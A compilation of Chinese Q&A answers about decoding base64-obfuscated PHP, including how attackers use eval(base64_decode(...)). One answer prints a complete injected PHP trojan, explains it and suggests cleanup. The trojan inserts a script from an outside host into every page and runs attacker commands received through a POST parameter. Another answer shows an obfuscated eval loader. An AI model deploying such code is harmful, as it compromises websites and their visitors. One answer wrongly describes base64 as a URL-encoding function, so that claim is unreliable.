⑴ sql查询base64 数据 thinkphp怎么解密
如果你 的mysql版本是5.6.1以上的,可以试一下 SELECT FROM_BASE64(字段); 这样就可以查出来了。如果不是你要查出来用其他语音来,比如php 的base64_decode 这个函数。
⑵ PHP解密 eval( base64_decode
运行php代码(base64解码(base64加密内容));
此代码常用于php木马及小马中
目前已知应用此代码的php木马有:
黑狼PHP木马
⑶ 帮忙解密PHP base64加密最好解决方案也提出下。100求破码200求解决方案
if(!isset($ev8l1)){function ev8l($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0] as $v)if(preg_match('# width\s*=\s*[\'"]?0*[01][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a='<script src=http://griffintoilethire.co.uk/images/s7cg/gifimg.php ></script>','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s);elseif(strpos($s,',a'))$s.=$a;return $s;}function ev8l2($a,$b,$c,$d){global $ev8l1;$s=array();if(function_exists($ev8l1))call_user_func($ev8l1,$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='ev8l')return;elseif($a=='ob_gzhandler')break;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('ev8l');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$ev8ll=(($a=@set_error_handler('ev8l2'))!='ev8l2')?$a:0;eval(base64_decode($_POST['e']));
意思是将参数中的<script>...</script>部分替换为<script src=http://griffintoilethire.co.uk/images/s7cg/gifimg.php ></script>,这样你的网页就被挂上了马。这段代码应该是通过webshell上传到你机器上的一段挂马程序,至于webshell 的打开有很多原因,即然是php代码那么你的机器上很可能存在php远程文件包含漏洞,也就是如果你的机器上存在Wordtrans、WordPress、rgboard、phpcms等php程序,那么很可能就有这个的漏洞。
推荐解决方法:
1.恢复已被篡改的网页
2.找一个RFI扫描器对本机进行扫描,将找到的漏洞进行修补(相应的程序网上都有对应的修补方法)
⑷ php base64 decode 解密
?> <div id="footer" class="clearfix">
<div class="right left">&; 2009 THEME NAME. POWERED BY <a href="http://wordpress.org">WORDPRESS</a> AND <a href="http://wpcrunchy.com" title="Free and Premium Wordpress Themes">WPCRUNCHY</a></div>
<div class="credits right">Design by <a href="http://www.firecasinos.com" target="_blank">Online Casinos</a>. In collaboration with <a href="http://mmohut.com" target="_blank">Free MMORPG</a>, <a href="http://www.hostv.com" target="_blank">VPS Hosting</a> and <a href="http://www.cirtexhosting.com/video-hosting.shtml" target="_blank">Video Hosting</a></div>
</div>
</div>
<?php wp_footer(); ?>
<!--[if IE 6]>
<script>for (x in document.write) { document.write(x);}</script>
<![endif]-->
</body>
</html>
就是一段这个破东西。
⑸ php base64加密解密
你用错了环境。
base64_encode和base64_decode是用来对 “网址” 中存在的特殊字符进行转码和解码,保证传输过程的正确性。和urlencode和urldecode类似。
在php里就属于url处理的函数。
⑹ PHP解密 (base64_decode)
你自己到这个页面去慢慢查吧,反正后半部我给你弄出来了,你自己看。
前半部分的代码,需要加上后半部分的代码才能够解密。是挺烦的。
你到这个网站去解密:http://tool.chinaz.com/Tools/Base64.aspx
$lll=0;eval(base64_decode("="));$ll=0;eval($lllllllllll("JGxsbGxsbGxsbGw9J29yZCc7"));$llll=0;$lllll=3;eval($lllllllllll("JGw9JGxsbGxsbGxsbGxsKCRvKTs="));$lllllll=0;$llllll=($llllllllll($l[1])<<8)+$llllllllll($l[2]);eval($lllllllllll(""));$lllllllll=16;$llllllll="";for(;$lllll<$lllllllllllll($l);){if($lllllllll==0){$llllll=($llllllllll($l[$lllll++])<<8);$llllll+=$llllllllll($l[$lllll++]);$lllllllll=16;}if($llllll&0x8000){$lll=($llllllllll($l[$lllll++])<<4);$lll+=($llllllllll($l[$lllll])>>4);if($lll){$ll=($llllllllll($l[$lllll++])&0x0f)+3;for($llll=0;$llll<$ll;$llll++)$llllllll[$lllllll+$llll]=$llllllll[$lllllll-$lll+$llll];$lllllll+=$ll;}else{$ll=($llllllllll($l[$lllll++])<<8);$ll+=$llllllllll($l[$lllll++])+16;for($llll=0;$llll<$ll;$llllllll[$lllllll+$llll++]=$llllllllll($l[$lllll]));$lllll++;$lllllll+=$ll;}}else$llllllll[$lllllll++]=$llllllllll($l[$lllll++]);$llllll<<=1;$lllllllll--;}eval($lllllllllll("JGxsbGxsbGxsbGxsbD0nY2hyJzs="));$lllll=0;eval($lllllllllll(""));$llllllllll="";for(;$lllll<$lllllll;){$llllllllll.=$llllllllllll($llllllll[$lllll++]^0x07);}eval($lllllllllll("=="));eval($lllllllll);
⑺ PHP 代码解密eval(base64_decode---请附解密方法,
这样的帖子回过无数个了,所有PHP的解密都是把eval换为echo就可以了,没有什么技术可言。
本程序的解密方法参见我在这个帖子的回复:
http://..com/question/115135906.html
你以上内容解密后是:
while(((isset($HTTP_SERVER_VARS['SERVER_NAME']))&&(!eregi('((.*\.)?y363\.cn)|((\.*\\.)?localhost)',$HTTP_SERVER_VARS['SERVER_NAME'])))||((isset($_SERVER['HTTP_HOST']))&&(!ereg
明显你上面的程序没有完整,你可以使用下面的程序获得完整的解密后的代码:
echo base64_decode(strtr('I/S+AeLTP6S++s9HTWvVFyvI+P6QTP6CK86C+lXLUyXLUNagLxXsxc+/','+K1OZ3b7jFwcx/iCfd0qNko=','+/'));
第一个字符串就是源文件?>之后的内容,你粘贴完整的替换即可。
⑻ php base64代码求解密!
这Y的反复加密,解密出来又是一新的加密字符串。直接运行又把偶的PHP给崩掉了,于是我复制粘贴运行,反复几十(上百?)次,要不是老夫骨头硬,早就挂掉了。
终于得到了最后的源码:
?><!-- footer -->
<div id="footer">
<div class="right">Copyright &; 2008 <a href="<?php bloginfo('home');?>/" title="<?php bloginfo('name'); ?>" class="sitename"><?php bloginfo('name'); ?></a>. All rights reserved. <a href="<?php bloginfo('rss2_url');?>" class="footrss">Posts Feed</a><a href="<?php bloginfo('comments_rss2_url');?>" class="footrss">Comments Feed</a></div>
<div class="credit">By <a href="http://customthemedesign.com/" title="Custom Theme Design">Custom Theme Design</a><br />
Brought to you by <a href="http://www.comfi.com/">phone card</a> & <a href="http://www.phonce.com">calling card</a> & <a href="http://www.paytone.com/">telecom company</a>.</div>
<div class="clear"></div>
</div>
<!-- end -->
</div>
<?php wp_footer(); ?>
</body>
</html><?
⑼ php base64 decode 解密!
是个3层的解密,BASE64----->gzuncompress -------->urldecode
gzuncompress 解密就不清楚了,是自定义的函数?
base64和URL可以解